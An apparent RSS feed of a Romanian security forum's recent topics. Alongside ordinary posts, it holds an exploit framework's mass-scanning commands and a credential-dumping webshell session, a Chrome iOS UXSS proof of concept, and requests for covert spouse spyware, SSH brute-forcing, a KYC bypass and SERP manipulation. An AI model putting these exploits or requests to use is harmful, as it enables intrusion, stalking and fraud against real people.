{"@attributes":{"version":"2.0"},"channel":{"title":"Technical Forums","link":"https:\/\/rstforums.com\/forum\/rss\/2-technical-forums.xml\/","description":"All technical forums","language":"en","item":[{"title":"ANCPI hacked","link":{},"description":"Nu zice nimeni nimic?\n \n\n\n\t \n \n\n\n\thttps:\/\/inpolitics.ro\/wp-content\/uploads\/2026\/07\/DNSC-T66-v2026.07.22-Anexa-tehnica-incident-ANCPI.pdf\n \n\n\n\t \n \n\n\n\tHai, sariti cu pareriile","pubDate":"Sat, 25 Jul 2026 07:57:19 +0000"},{"title":"securitate android","link":{},"description":"Ce parere aveti despre Graphene, imi ofera o securitate mai buna a telefonului, astfel ca mesajele si aplicatile sa fie in controlul meu, iar mesajele si apelurile sa nu mai poata fi ascultate?","pubDate":"Mon, 20 Jul 2026 14:50:57 +0000"},{"title":"WordPress Core \"wp2shell\" RCE flaws get public exploits, patch now","link":{},"description":"On July 17, 2026, WordPress released versions 7.0.2 and 6.9.5 and triggered a forced automatic update across all affected installations, a measure the project reserves for the most severe cases. The cause is a vulnerability chain dubbed wp2shell, which lets an attacker without credentials execute code on the server starting from a single anonymous HTTP request. No plugins are required, no special configuration is needed: a freshly downloaded, never-touched WordPress installation is enough. Less than twenty-four hours after the patch was published, fourteen repositories with exploits, scanners, and test labs had already appeared on GitHub, the most followed of which counts 44 stars and 15 forks.\n \n\n\n\t \n \n\n\n\tRef:\n \n\n\n\t \n \n\n\n\t- https:\/\/www.bleepingcomputer.com\/news\/security\/wordpress-core-wp2shell-rce-flaws-get-public-exploits-patch-now\/\n \n\n\n\t- https:\/\/wordpress.org\/news\/2026\/07\/wordpress-7-0-2-release\/\n \n\n\n\t- https:\/\/pasqualepillitteri.it\/en\/news\/8405\/wp2shell-wordpress-rce-cve-2026-63030-en\n \n\n\n\t- https:\/\/github.com\/NULL200OK\/WP2Shell","pubDate":"Sun, 19 Jul 2026 09:21:46 +0000"},{"title":"JoomlaSniper CVE-2026-48907 10\/10 CRITIC","link":{},"description":"JoomlaSniper is a comprehensive exploitation framework for CVE-2026-48907, an unauthenticated Remote Code Execution vulnerability in the JCE (Joomla Content Editor) extension for Joomla CMS.\n \n\n\n\tThe vulnerability allows attackers to upload arbitrary PHP files via the unauthenticated profiles.import endpoint, without any authentication. Depending on server configuration, this results in full remote code execution.\n \n\n\n\t \n \n\n# Full recon pipeline \u2014 find Joomla sites with JCE\nsubfinder -d target.com -silent | \\\n  httpx -silent -match-string \"com_jce\" | \\\n  python3 JoomlaSniper.py -t 10 -o results.json\n\n# Shodan export \u2192 httpx filter \u2192 JoomlaSniper\ncat shodan_results.txt | \\\n  httpx -silent -path \/plugins\/editors\/jce\/jce.xml -status-code -match-code 200 | \\\n  awk '{print $1}' | \\\n  python3 JoomlaSniper.py -t 20 --silent -o rce_results.json\n\n\n\t \n \n\n   JOOMLASNIPR \u2014 INTERACTIVE SHELL\n    Target : https:\/\/target.com\n    Shell  : https:\/\/target.com\/tmp\/jce4x2k9a.xml.php\n    Vector : V1:tmp\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\n\njce@target.com$ id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\njce@target.com$ sysinfo\nOS:   Linux server 5.4.0-208-generic #228-Ubuntu\nUser: uid=33(www-data)\nCWD:  \/var\/www\/html\nPHP:  PHP 8.1.27\n\njce@target.com$ loot\n\/var\/www\/html\/configuration.php\n$user = 'joomla_db_user';\n$password = 'S3cur3P@ssw0rd!';\n$db = 'joomla_production';\n$host = 'localhost';\n\njce@target.com$ funcs\nshell_exec: OK\nexec:       OK\nsystem:     OK\npassthru:   OK\n\njce@target.com$ exit\nShell session ended.","pubDate":"Fri, 17 Jul 2026 10:53:55 +0000"},{"title":"Salut tuturor! \u00cenc\u00e2ntat s\u0103 fac parte din aceast\u0103 comunitate \ud83c\uddf7\ud83c\uddf4","link":{},"description":"Salut, tuturor! \n\t \n \n\n\n\tSunt bucuros s\u0103 m\u0103 al\u0103tur acestei comunit\u0103\u021bi \u0219i sper s\u0103 cunosc oameni pasiona\u021bi, gata s\u0103 \u00eemp\u0103rt\u0103\u0219easc\u0103 idei \u0219i experien\u021be valoroase.\n \n\n\n\tDe\u0219i nu sunt din Rom\u00e2nia, lucrez la proiecte dedicate utilizatorilor rom\u00e2ni \u0219i admir comunitatea de aici pentru nivelul ridicat de cuno\u0219tin\u021be \u0219i dorin\u021ba de a ajuta.\n \n\n\n\tSunt interesat de SEO, dezvoltare web \u0219i marketing digital. \n\t \n\t\u00cemi place s\u0103 \u00eenv\u0103\u021b lucruri noi \u0219i, \u00een acela\u0219i timp, s\u0103 contribui cu informa\u021bii care pot fi utile \u0219i altor membri.\n \n\n\n\tDac\u0103 ave\u021bi recomand\u0103ri pentru un nou membru sau sfaturi despre comunitate, le voi aprecia cu mare drag.\n \n\n\n\tV\u0103 mul\u021bumesc pentru primire \u0219i v\u0103 doresc mult succes tuturor! \ud83d\ude0a \n\t \n \n\n\n\tP.S. Unul dintre proiectele la care lucrez este Verificare Rovinieta, o platform\u0103 creat\u0103 pentru a ajuta \u0219oferii din Rom\u00e2nia s\u0103 g\u0103seasc\u0103 rapid informa\u021bii utile despre verificarea rovinietei \u0219i alte verific\u0103ri auto.","pubDate":"Thu, 09 Jul 2026 02:37:28 +0000"},{"title":"Verificare KYC","link":{},"description":"Cunoaste cineva cum se poate trece de verificare KYC cu buletinul? (In obs merge, dar nu il ia robotu)","pubDate":"Mon, 08 Jun 2026 05:42:43 +0000"},{"title":"Decodare telefon Sony vechi","link":{},"description":"Salut!\n \n\n\n\tAm acest telefon w910i codat in Vodafone .\n \n\n\n\tNu am cablu USB pt el.\n \n\n\n\tas avea nevoie de codul NCK.\n \n\n\n\t \n \n\n\n\tImei:35155503-799913-1-40\n \n\n\n\tProvider ID:1200-3243\n \n\n\n\t \n \n\n\n\tAs fi recunosc\u0103tor dac\u0103 s ar gasi o persoana ce mi ar putea genera codul.","pubDate":"Sat, 30 May 2026 07:26:46 +0000"},{"title":"ZA Hacker","link":{},"description":"Hey guys, I am a Polish-South-African, I have worked in Moldova, and partied in Romania a lot. I've always seen this forum around so I finally decided to join it. Anyone who hates the Russians as much as us Polaks, it's the Romanians. So brothers in arms.\n \n\n\n\t \n \n\n\n\tCheers,\n \n\n\n\tX","pubDate":"Tue, 26 May 2026 17:51:57 +0000"},{"title":"Copy Fail: 732 Bytes to Root on Every Major Linux Distribution","link":{},"description":"Copy Fail (CVE-2026-31431) is a logic bug in the Linux kernel's authencesn cryptographic template. It lets an unprivileged local user trigger a deterministic, controlled 4-byte write into the page cache of any readable file on the system. A single 732-byte Python script can edit a setuid binary and obtain root on essentially all Linux distributions shipped since 2017.\n \n\n\n\tThe kernel never marks the corrupted page dirty for writeback, so the file on disk remains unchanged and ordinary on-disk checksum comparisons miss the modification. However, the page cache is what actually gets read when accessing the file, so the corrupted in-memory version is immediately visible system-wide. A local unprivileged user can turn this into root by corrupting the page cache of a setuid binary. The same primitive also crosses container boundaries because the page cache is shared across the host.\n \n\n\n\tThis finding was AI-assisted, but began with an insight from Theori researcher Taeyang Lee, who was studying how the Linux crypto subsystem interacts with page-cache-backed data. He used Xint Code to scale his research across the entire crypto subsystem, and Copy Fail was the most critical finding in the report.\n \n\n\n\t \n \n\n\n\thttps:\/\/imgur.com\/a\/z2EsMAg","pubDate":"Thu, 30 Apr 2026 09:49:27 +0000"},{"title":"Salut","link":{},"description":"Ma pote ajuta cineva sa fac ceva la un Joc va rog nu degheaba","pubDate":"Thu, 23 Apr 2026 21:45:13 +0000"},{"title":"Pentest-Tools.com is launching weekly \"Office Hours\"","link":{},"description":{},"pubDate":"Tue, 21 Apr 2026 04:43:13 +0000"},{"title":"Salutare all","link":{},"description":"Va salut am o \u00eentrebare are cineva un cont de rockstar sa imi \u00eemprumute sa joc gta 5 online c\u00e2teva zile max o s\u0103pt\u0103m\u00e2n\u0103","pubDate":"Sat, 04 Apr 2026 00:33:41 +0000"},{"title":"Open Tracker Signups, Applications, and Invites","link":{},"description":"Invitatii Trackers\/Open Signups","pubDate":"Wed, 18 Mar 2026 19:28:59 +0000"},{"title":"Propunere schimbare ni\u0219\u0103 pentru forum","link":{},"description":{},"pubDate":"Tue, 17 Mar 2026 16:27:46 +0000"},{"title":"Ajutor deschidere baze de date contabile","link":{},"description":{},"pubDate":"Mon, 16 Mar 2026 17:10:28 +0000"},{"title":"Daca ma poate ajuta careva","link":{},"description":"salutare, am si eu un cont de steam vechi de vreo 17 ani cred, inactiv de 9,10 ani, mi am uitat parola, iar cei de la steam nu accepta da mi trimita link pentru resetare parola decat daca le trimit un cd key, eu steam ul l am cumparat prin sms cum era pe vremuri , sms , luau euro din cont si primeam condul, acum nu mai am nimic decat acces la adresa de mail","pubDate":"Sat, 14 Mar 2026 17:58:29 +0000"},{"title":"Vand advertoriale in aproximativ 700 site uri din romania","link":{},"description":"Vand mai multe pachete de advertoriale la pret bun, site uri cu autoritate medie, sau mare si am si o oferta f buna, advertoriale pe 107 site uri cu 2500 lei","pubDate":"Fri, 06 Mar 2026 07:56:30 +0000"},{"title":"Large-scale online deanonymization with LLMs","link":{},"description":"We show that large language models can be used to perform at-scale deanonymization. With full Internet access, our agent can re-identify Hacker News users and Anthropic Interviewer participants at high precision, given pseudonymous online profiles and conversations alone, matching what would take hours for a dedicated human investigator. We then design attacks for the closed-world setting. Given two databases of pseudonymous individuals, each containing unstructured text written by or about that individual, we implement a scalable attack pipeline that uses LLMs to: (1) extract identityrelevant features, (2) search for candidate matches via semantic embeddings, and (3) reason over top candidates to verify matches and reduce false positives. Compared to classical deanonymization work (e.g., on the Netflix prize) that required structured data , our approach works directly on raw user content across arbitrary platforms. We construct three datasets with known ground-truth data to evaluate our attacks. The first links Hacker News to LinkedIn profiles, using crossplatform references that appear in the profiles. Our second dataset matches users across Reddit movie discussion communities; and the third splits a single user\u2019s Reddit history in time to create two pseudonymous profiles to be matched. In each setting, LLM-based methods substantially outperform classical baselines, achieving up to 68% recall at 90% precision compared to near 0% for the best non-LLM method. Our results show that the practical obscurity protecting pseudonymous users online no longer holds and that threat models for online privacy need to be reconsidered.\n \n\n\n\t \n \n\n\n\tDownload: https:\/\/arxiv.org\/pdf\/2602.16800","pubDate":"Fri, 27 Feb 2026 14:27:32 +0000"},{"title":"AI\/ML Pentesting Roadmap","link":{},"description":{},"pubDate":"Fri, 27 Feb 2026 14:26:49 +0000"},{"title":"[Q] Sfaturi pentru un viitor in CyberSecurty?","link":{},"description":"Vreau sa incep sa lucrez la ceva pentru viitorul meu, cu ce ar trebuii sa incep pentru un viitor legat de securitatea cibernetica?","pubDate":"Thu, 26 Feb 2026 23:01:50 +0000"},{"title":"Malwarebytes Smoking Crack (0day + Banger Song)","link":{},"description":"Ati vazut asta? \n \n\n\n\t \n \n\n\n\t#UwU Underground","pubDate":"Sat, 21 Feb 2026 11:35:46 +0000"},{"title":"Linux Kernel Dirty Pipe Exploitation (Logic Bug \u2014 CVE-2022\u20130847)","link":{},"description":{},"pubDate":"Thu, 19 Feb 2026 07:14:59 +0000"},{"title":"Hello from Indonesia","link":{},"description":"Hello buddy ! \n \n\n\n\tI am from Indonesia, \n \n\n\n\tI am a Chinese born in Indonesia.\n \n\n\n\t \n \n\n\n\tI just notice this forum after doing google search for a linux kernel rootkit that I created in 2014. \n \n\n\n\t \n \n\n\n\tHere's the topic : \n \n\n\n\n\t \n \n\n\n\tI thinks this forum is cool and it will be nice to register here , in my past time, I have some friends from Europe\n \n\n\n\tsome Albanian hacker friends in my past time  such as x-hack, danzel\n \n\n\n\ta greece friend : getch\n \n\n\n\t \n \n\n\n\tis Romania near to Albania and Greece ?","pubDate":"Thu, 19 Feb 2026 07:11:55 +0000"},{"title":"Client OPNsense (pFsense)","link":{},"description":"Bun\u0103 seara \n \n\n\n\t\u00cencerc de ceva timp s\u0103 \u00eenlocuiesc un router comercial \"de top\" cu un mini pc pe care am instalat OPNsense (\u0219i \u00eenainte pfSense).\n \n\n\n\tAcest mini pc transformat \u00een router doresc s\u0103 devin\u0103 clientul mai multor servere VPN.\n \n\n\n\tCertificatele sunt emise de routere consumer \u0219i nu au formatul necesar (X.509). Ce solu\u021bii a\u0219 avea? Un tutorial ? \n \n\n\n\tP.S sunt un novice \n \n\n\n\tMul\u021bumesc","pubDate":"Sun, 15 Feb 2026 17:49:12 +0000"},{"title":"Cum merge bosilor hackereala pe la birou ?","link":{},"description":"Bosilor, cum merge hackareala pe la biroul de corporatristi ?? N-am mai intrat de anul trecut. La mine merge de rupe... In ianuarie a bubuit treaba, peste 1,5 milioane de coco venit. Chinezii de la Huione au ajuns la 10-20 de miliarde de coco furati anul trecut... deci sunt un pestisor pe langa chinezii aia...\n \n\n\n\t \n \n\n\n\tPe la voi la birou cum merge cu hackareala ?? Gasiti bug-uri din alea sa va platiti ratele si sa cumparati pateul bucegi ? Va mai sponsorizeaza astia sa mergeti pe la 2-3 conferinte pe an ca sa adormiti prin sala ???","pubDate":"Tue, 03 Feb 2026 23:25:46 +0000"},{"title":"Webshell needed","link":{},"description":"Salut,\n \n\n\n\t \n \n\n\n\tAm nevoie de un webshell mai recent, are careva? Vreau sa rulez niste teste la un EDR.\n \n\n\n\t \n \n\n\n\tMersi","pubDate":"Mon, 02 Feb 2026 08:53:19 +0000"},{"title":"1000 lei","link":{},"description":"Va salut! Dupa cum zice si titlul, caut un mod de a reusi sa fac suma aceasta in 2 zile. Din cauza unor probleme personale ( un deces, schimbat job plus chirie ) am ajuns in punctul in care sa raman efectiv pe zero cu finantele, plus imprumuturi pana reusesc sa iau primul salariu aici. Dar vorba aia, chiria trebuie platita, iar proprietarul de aici m a pasuit deja luna trecuta cand am avut acel eveniment tragic in familie. Sunt unul dintre userii vechi pe aici, de cand matza moarta neagra se injura cu kw3, pax ne dadea xssuri sa furam prajituri la yahoo, ahead isi pierdea masina si virusica era pe garena, ca sa mai depanam amintri, dar nu postez de pe contul meu, cred ca de rusine. Nu am aparut aici ca sa cer ceva gratis, dar as avea rugamintea daca aveti nevoie de cineva care sa va ajute cu diferite taskuri contracost ce implica un calculator, sa ma contactati, si daca o pot face va ajut cu drag. Va multumesc, cu respect.","pubDate":"Tue, 13 Jan 2026 20:25:24 +0000"},{"title":"SVG Filters Clickjacking 2.0: What to Watch for and How to Defend Your Site","link":{},"description":"RST just shared an interesting write-up on \u201cSVG Filters \u2013 Clickjacking 2.0,\u201d posted in the Exploituri section (Dec 7, 2025). RST Forums The big idea is simple: attackers keep finding new ways to hide or reshape what users \u201cthink\u201d they are clicking, so the user ends up approving the wrong action. This matters most for high-risk flows like payment approval, account recovery, password changes, crypto transfers, admin panels, and OAuth consent screens. Game Hub Emulator If you run a site or app, the best defense is layered: block framing where possible (CSP frame-ancestors is the modern choice, with X-Frame-Options as legacy backup), require re-auth or step-up checks for sensitive actions, add clear confirmation screens that show the exact action and target, and review any SVG rendering or filter usage in UI layers that sit near \u201cconfirm\u201d buttons. Also test your key pages in a \u201chostile embed\u201d scenario during security review, because clickjacking is often a UX trap more than a pure code bug. The forum post links the full external article for anyone who wants the deep dive.","pubDate":"Thu, 08 Jan 2026 09:37:39 +0000"},{"title":"[Vand] YubiKey Yubico 5C USB-C Securitate hardware completa, dispozitiv criptografic - SIGILAT, nou si IEFTIN","link":{},"description":{},"pubDate":"Fri, 12 Dec 2025 11:28:16 +0000"},{"title":"salutare, cineva care se descurca cu go?","link":{},"description":"Am un script \u00een Go pentru brute-force SSH care func\u021bioneaz\u0103 bine \u2013 detecteaz\u0103 honeypot-uri, conturi nologin \u0219i servere reale. A\u0219 dori s\u0103 modific scriptul astfel \u00eenc\u00e2t s\u0103 func\u021bioneze pe domenii: username-ul s\u0103 nu mai fie prestabilit, ci s\u0103 fie format din primele 7 caractere ale numelui domeniului, iar parola s\u0103 fie numele domeniului f\u0103r\u0103 extensia (.net, .com etc.). Sunt dispus s\u0103 pl\u0103tesc \u00eentre 50 \u0219i 150 lei pentru aceast\u0103 modificare.","pubDate":"Mon, 08 Dec 2025 20:28:03 +0000"},{"title":{},"link":{},"description":{},"pubDate":"Sun, 07 Dec 2025 21:04:08 +0000"},{"title":"SVG Filters - Clickjacking 2.0","link":{},"description":"O metoda noua si interesanta de clickjacking. Nu voi da copy\/paste la articol pentru ca e muncit si e pacat sa ii fac duplicate content. Il gasiti in forma integrala aici https:\/\/lyra.horse\/blog\/2025\/12\/svg-clickjacking\/\n \n\n\n\t \n \n\n\n\tAlte articole de pe blogul ei: https:\/\/lyra.horse\/blog\/","pubDate":"Sun, 07 Dec 2025 20:08:17 +0000"},{"title":"[VIDEO] Hacking '\ud83d\ude02' to Track ANY WhatsApp or Signal User","link":{},"description":{},"pubDate":"Fri, 05 Dec 2025 10:11:05 +0000"},{"title":"De vizionat la plictiseala","link":{},"description":"Uite asa cum stateam cu berea in brate am dat din intamplare peste ceva frumos de vizionat daca cineva se plictiseste.\n \n\n\n\t \n \n\n\n\t(24) The Man Who Made Everything on the Internet Free - YouTube\n \n\n\n\tThe Man Who Tried to Unmask Anonymous\n \n\n\n\t \n \n\n\n\tps: nu e al meu canalul, nu am nici o afiliere, nu reclama, pur si simplu beer \ud83c\udf7a, alune si amintiri \ud83e\udd19\n \n\n\n\tDaca mai stiti ceva interesant de vizionat lasa-ti un reply...\n \n\n\n\thastag 2026 sa-mi bag pl, parca alaltaieri era vara lu '09 cand @Nytro imi dadea warn ca scriam dea-n pulea \ud83d\ude02","pubDate":"Tue, 02 Dec 2025 22:15:11 +0000"},{"title":"Cont ebaykleineanzaigen !","link":{},"description":"Salutare! \n \n\n\n\tAm o problema cu ebaykleineanzaigen.de, am nevoie de mai multe conturi active, dar ma blocheaza mereu, pentru ca imi fac publicitare la o mica combinatie sa zic asa fara sa fiu ( firma )  si ma blocheaza! Tot mi-am facut conturi noi, de pe care puteam sa postez, din nou pe acest site, ba faceam de pe telefonul de firma, ba faceam de pe laptopul iubitei mele, pana cand si acolo au blocat tot, si chiar daca pot sa fac cont nou, nu mai pot sa postez. \n \n\n\n\tAm incercat asa : schimbare IP cu VPN, fara rezultat , am reinstalat browser si am sters cookies, fara rezultat, mi-am dat Hotspot, de pe telefon pe laptop, si tot nu am reusit sa postez din nou, chiar daca cont nou mi-am putut face. Eu mai am un cont principal care il folosesc de pe telefon si imi merge perfect, acel cont nu vreau sa il risc, dar am nevoie de altele noi, in concluzie : Cum au reusit sa faca asta? Raman cookies-urile, undeva salvate si nu stiu eu ?!  Nu pare a fi un ban pe ip. \n \n\n\n\tAstept solutii din partea voastra, cu mare recunostinta!","pubDate":"Tue, 25 Nov 2025 18:48:00 +0000"},{"title":"Do you think most people who enjoy black hat hacking also want to become white hat hackers?","link":{},"description":"Hi everyone! Sorry I only speak English (and some French) so I have been translating the posts on this forum as I am really interested in the discussions here. I just wanted to post my own question, I'm just curious how many people who enjoy black hat hacking actually hope to one day work in infosec or something where they can use their skills legitimately (I mean if they don't already, since I'm sure some people wear both hats). Any thoughts?","pubDate":"Sat, 08 Nov 2025 18:30:59 +0000"},{"title":"Aplica\u021bie Spion","link":{},"description":"Salutare , nu m\u0103 pricep in ale software-ului si din aceasta cauz\u0103 apelez la ajutorul celor pricepu\u021bi. Sunt interesat de o aplica\u021bie\/ program pe care sa o\/s\u0103-l instalez in telefonul \u0219i laptopul so\u021biei pentru a afla tot ce acceseaz\u0103 ea ( site-uri, aplicatii \u0219i parole ) fara c\u0103 ea s\u0103-\u0219i de-a seama, .v-as fi foarte recunosc\u0103tor dac\u0103 m-a\u021bi ajuta . Mul\u021bumesc anticipat la toat\u0103 lumea","pubDate":"Thu, 06 Nov 2025 18:57:34 +0000"},{"title":"New here","link":{},"description":"Hey folks, just checking out the community. I\u2019m interested in how people think and work in this space \u2014 hoping to pick up some insights and contribute where I can!","pubDate":"Thu, 06 Nov 2025 01:52:14 +0000"},{"title":"Google SERP Clicker - cine a mai testat asa ceva?","link":{},"description":"De cateva zile testez o metoda de a manipula rezultatele din SERP cu un clicker care acceseaza rezultatele din Google. Rezultatele sunt... ciudatele rau. Poate se gaseste cineva pe aici care a mai testat asa ceva si vrea sa isi impartaseasca experienta. \n\t \n\tMetoda: \n\t \n\t- am creeat un robot care acceseaza pagina Google, tasteaza query, da enter, misca mouse pe ecran (coordonate x,y random), da scroll, da click pe cateva rezultate (coordonate x,y random pe titlul paginii), apoi, la final, da click pe rezultatul siteului target. Tot ce inseamna miscare a mouse-ului, clicks, mouse scroll, este random pe coordonate x, y. Nu am facut inca mouse-ul sa aiba si traiectorie de tip \"arc\" ci doar in linii drepte. Robotul este 100% facut de mine, nu un program abuzat de sute de persoane inainte. \n\t- folosesc proxy-uri rezidentiale de Romania (sunt mai putin tavalite decat cele din US, UK etc). Urmeaza sa testez cu ip-uri de mobil orange\/vodafone\/telekom.\n \n\n\n\t- verificarea rezultatelor am facut-o atat de pe telefoane cat si de pe mai multe browsere cu sau fara istoric, cu sau fara cont logat, cu sau fara proxy-uri.\n \n\n\n\t \n \n\n\n\tPrimele teste au avut scopul sa daram rezultatul folosit la teste de pe pozitiile pe care se afla initial. Urmeaza sa fac teste si pe cresterea unei pagini in SERP dupa ce pun la punct strategia. \n\t \n\tRezultatele obtinute au fost urmatoarele: \n\t \n \n\n\n\tZiua 1: pagina de test era pe pozitia 8 pe toate browserele cu care am facut verificarea initiala. Pagina de test apartine unui site foarte cunoscut, foarte vechi, cu foarte mult trafic si cu ranking foarte bun in general. Query-ul meu continea si un keyword random (sa zicem MG8320) care automat scadea volumul de cautari pe acel query la 0, ca sa nu fie afectat experimentul de o pozitie bine consolidata anterior. Dupa cateva ore pagina de test a ajuns pe pozitia 6, apoi 4. Timp de 10 ore a ramas undeva pe pozitiile 4-6, in functie de device-ul folosit, de browserele folosite si de ip-ul folosit. La fix 12 ore dupa ce am dat drumul la robot pagina a zburat pe pozitia 25 si acolo a ramas de o saptamana. Rezultat: multumitor - poate fi folosit la negative SEO. \n\t \n\tZiua 2: o alta pagina de test era pe pozitia 6 pe un query cu cautari multe si cu o pozitie consolidata de ani de zile. Dupa 12 ore de rulat robotelul, pozitia nu s-a schimbat deloc. Rezultat: fail total. \n\t \n\tZiua 3: o alta pagina de test era pe pozitiile 5-9 pe un query cu numar mediu de cautari. Dupa cateva ore au inceput sa apara fluctuatii mari in functie de browserul si dispozitivul folosit pentru verificari. A jonglat intre pozitia 2 si pozitia 11. Dupa 12 ore a ramas infipt pe pozitiile 6 - 9 in functie de browser, device si ip folosite pentru verificari. Rezultat: mixed. Nu pot spune ca a fost un succes, dar nu a fost nici fail, pentru ca ce am facut eu a avut impact pe termen scurt. Diferenta de la pozitia 5 la pozitia 6 nu poate fi luata in seama pentru ca fluctuatiile de acest fel sunt normale la Google. \n\t \n\tZiua 4: o alta pagina de test era pe pozitia 2. Dupa 12 ore de rulat clickerul a ramas tot pe 2. Rezultat: fail. \n\t \n\tAm in minte posibilele cauze care duc la fail sau succes, printre ele numarandu-se calitatea proxyurilor, cat de bine consolidata a fost pozitia paginii pe acel query, detectarea browserelor mele anonime, sau pur si simplu algoritmi Google despre care nu stiu. Traiectoria cursorului nu cred ca are impact asa cum o are la serviciul recaptcha si poate fi scoasa din ecuatie. \n\t \n\tAsa ca intrebarea mea este urmatoarea: a mai facut careva dintre voi astfel de teste pe Google si a putut sa reproduca anumite rezultate, fie ca s-a dus rezultatul folosit pentru teste in jos, fie ca a crescut pe pozitii mai bune?","pubDate":"Mon, 27 Oct 2025 22:36:57 +0000"},{"title":"\u0218ters","link":{},"description":"\u0218ters","pubDate":"Tue, 21 Oct 2025 23:44:09 +0000"},{"title":"Posibilitate de decriptare date la un USB Disk Buffalo criptat cu Secure Manager Lock easy","link":{},"description":"Salutare la toata lumea,\n \n\n\n\t \n \n\n\n\tcu speranta ca are cineva o idee, incerc sa access un disk USB, nefolosit de peste 15 ani, de la Buffalo criptat cu Secure Manager Lock easy. Parolade decriptare date nu a fost notata din pacate nicaieri.\n \n\n\n\tDaca are cineva o idee ce as putea sa incerc, este binevenita.\n \n\n\n\tVa multumesc","pubDate":"Tue, 21 Oct 2025 07:59:55 +0000"},{"title":"Long time no see","link":{},"description":"Salutari si bine v-am regasit\n \n\n\n\tMi-am aminte recent de forum, ma bucura faptul ca este inca in picioare dupa atata timp. Ultima data aveam la profil \"bautor de palinca\" :)). O zi faina sa aveti!.","pubDate":"Tue, 14 Oct 2025 13:06:54 +0000"},{"title":"Parola telefon android","link":{},"description":"Salut, recent un unchi de-ai mei a degedat, odata cu el s-a dus si parola telefonului. Sotia lui are nevoie sa acceseze anumite documente destul de importante din telefon. Exista vreo optiune de a trece pe langa acea parola fara a-i da resetare totala? Multumesc!","pubDate":"Tue, 14 Oct 2025 12:55:31 +0000"},{"title":"Pachete SEO de advertoriale pentru campanii complete","link":{},"description":"Salut,\n \n\n\n\t \n \n\n\n\tOfer pachete SEO de advertoriale pentru campanii complete. \n\t\u2714 Publicare rapid\u0103 \n\t\u2714 Distribuire pe pagini de Facebook \n\t\u2714 Linkuri interne la fiecare articol + linkuri externe \u00een pachetele dedicate \n\t\u2714 Raport de publicare trimis dup\u0103 fiecare comand\u0103 \n\t\u2714 Colaborare transparent\u0103, cu factur\u0103 inclus\u0103 pentru fiecare comand\u0103\n \n\n\n\t \n \n\n\n\tPentru detalii, \u00eemi po\u021bi scrie \u00een privat.","pubDate":"Sat, 04 Oct 2025 10:47:19 +0000"},{"title":"DOM XSS: Bypassing Server-side Cookie Overwrite, Chrome innerHTML Quirk, and JSON Injection","link":{},"description":{},"pubDate":"Sun, 28 Sep 2025 08:15:33 +0000"},{"title":"Chrome iOS UXSS Using iOS Shortcuts and Bookmarklets","link":{},"description":"Report description\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tChrome iOS UXSS Using iOS Shortcuts and Bookmarklets\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tBug location\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tWhere do you want to report your vulnerability?\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tChrome VRP \u2013 Report security issues affecting the Chrome browser. See program rules\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe problem\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tPlease describe the technical details of the vulnerability\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tIn Chrome iOS using iOS Shortcuts we can add a new bookmark without any user interaction and confirmation, this bookmark can also be a javascript: URI to become a bookmarklet and get code execution on opened site. Using this behavior and couple other quirks we can silently add a bookmarklet, open a website then showing the bookmarks when tapping on it the bookmarklet will execute on the current opened website without the user knowing.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tI don't know if there is some protection on this or it's some broken bugs that prevented us to do this straightforward but here is the pseudo code which we are able to perform the attack.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tOpen bookmarks\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tOpen blank page and close it immediately\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tAdd the bookmarklet\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tWait 2 seconds and open the user bookmarks\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tPlay Chrome dino game\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tOpen google.com\n\t\t\t\t\t\t\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tIn the final stage the user sees the bookmarks and in background google.com is opened when tapping on the bookmarklet the code will execute on google.com.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tPOC:\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tAdd this Shortcut https:\/\/www.icloud.com\/shortcuts\/cf976fbc13294b00849d5564432b2d0a\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tRun it\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tTap on where it says Tap Here\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tXSS on google.com\n\t\t\t\t\t\t\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tVideo POC attached.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tThe underlying issue is ability to add a bookmark silently without user knowing or confirmation also no check on the bookmark url which allow an attacker to insert javascript: urls.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tImpact analysis \u2013 Please briefly explain who can exploit the vulnerability, and what they gain when doing so\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tUsing this vulnerability an attacker can trick a user to execute arbitrary code on targeted origin by running a shortcut and tapping on a bookmarklet displayed on the screen without knowing anything about it.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe cause\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tWhat version of Chrome have you found the security issue 